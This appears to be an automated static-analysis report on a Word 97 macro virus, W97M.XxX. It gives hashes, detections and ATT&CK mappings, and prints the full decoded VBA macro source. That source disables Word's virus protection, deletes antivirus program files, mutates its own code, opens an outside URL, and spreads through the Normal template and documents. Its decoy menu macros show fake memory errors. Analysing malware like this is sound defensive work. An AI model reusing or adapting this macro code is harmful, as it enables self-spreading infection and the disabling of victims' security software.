W97M.XxX — Office (OLE) malware analysis

Static analysis result for SHA-256 4b8ea5b9f113323e…

MALICIOUS

Office (OLE)

33.0 KB Created: 2000-01-05 16:52:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 24894a3e6d229f5041797943a3eea1a4 SHA-1: 0afa5ab7cffac29721f1cf72fa6e3d47bed7c601 SHA-256: 4b8ea5b9f113323e76c983b6396d3f505de4c84f54226f81f9d4d044450fea3e
204 Risk Score

Malware Insights

W97M.XxX · confidence 90%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, a common technique for malicious Office documents. The script attempts to export itself to C:\Hf755.sys and then downloads a second-stage payload from http://www.xxx.com. This behavior is consistent with the W97M.XxX family, which is known for its macro-based downloaders.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.xxx.com� In document text (OLE body)
    • http://www.xxx.comIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3375 bytes
SHA-256: 75eabb8c79c5f4f989de18cd319732d0904d99634530b53c40241927b12b5d45
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Hf755"

Sub AutoOpen()

    ' Word97 Macro Virii Creation Kit
    ' ===============================
    ' Code by Jack Twoflower/LzØ Vx
    ' ===============================
    ' W97M.XxX

On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
.ScreenUpdating = False
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Application.VBE.ActiveVBProject.VBComponents("Hf755").Export "C:\Hf755.sys"
 'This code is taken from Pyro | Thanks
Set Current = MacroContainer
For Grow = 1 To 20
Number = Current.VBProject.VBComponents("Hf755").CodeModule.ProcCountLines("AutoOpen", vbext_pk_Proc)
RandomLine = Int(Rnd() * Number + 1)
RemarkLength = Int(Rnd() * 40 + 1)
For Length = 1 To RemarkLength
Remark = Remark + Chr$(Int((90 - 65 + 1) * Rnd + 65))
Next Length
Current.VBProject.VBComponents("Hf755").CodeModule.InsertLines RandomLine, vbTab & "Rem " & Remark
Remark = ""
Next Grow
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\Norton Antivirus\Virscan.dat")
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
Kill ("C:\TBAV\TBAV.DAT")
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
ActiveDocument.FollowHyperlink Address:="http://www.xxx.com", NewWindow:=False, AddHistory:=True
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
.Heading = "W97MVCK[Jack Twoflower/LzØ Vx]"
.Animation = msoAnimationSearching
.Show
End With
Assistant.Visible = False
Set Bl851 = ActiveDocument.VBProject.VBComponents
Set Cf941 = NormalTemplate.VBProject.VBComponents
For y = 1 To Cf941.Count
If Cf941(y).Name = "Hf755" Then Hg214 = True
Next y
For y = 1 To Bl851.Count
If Bl851(y).Name = "Hf755" Then Sf117 = True
Next y
If Hg214 = True And Sf117 = True Then Exit Sub
If Hg214 = True And Sf117 <> True Then Bl851.Import "c:\Hf755.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Hg214 <> True And Sf117 = True Then Cf941.Import "c:\Hf755.sys": NormalTemplate.Save
If Day(Now()) = 31 Then MsgBox "This virus was created with W97MVCK by Jack Twoflower"
End Sub
Sub ExtrasMakro()
MsgBox "Nicht genug Arbeitsspeicher!", 48, "Microsoft Word"
Call AutoOpen
End Sub
Sub AnsichtCode()
MsgBox "Nicht genug Arbeitsspeicher!", 48, "Microsoft Word"
Call AutoOpen
End Sub
Sub AnsichtVBCode()
MsgBox "Nicht genug Arbeitsspeicher!", 48, "Microsoft Word"
Call AutoOpen
End Sub
Sub DateiDokVorlagen()
MsgBox "Nicht genug Arbeitsspeicher!", 48, "Microsoft Word"
Call AutoOpen
End Sub
Sub FormatFormatvorlage()
MsgBox "Nicht genug Arbeitsspeicher!", 48, "Microsoft Word"
Call AutoOpen
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.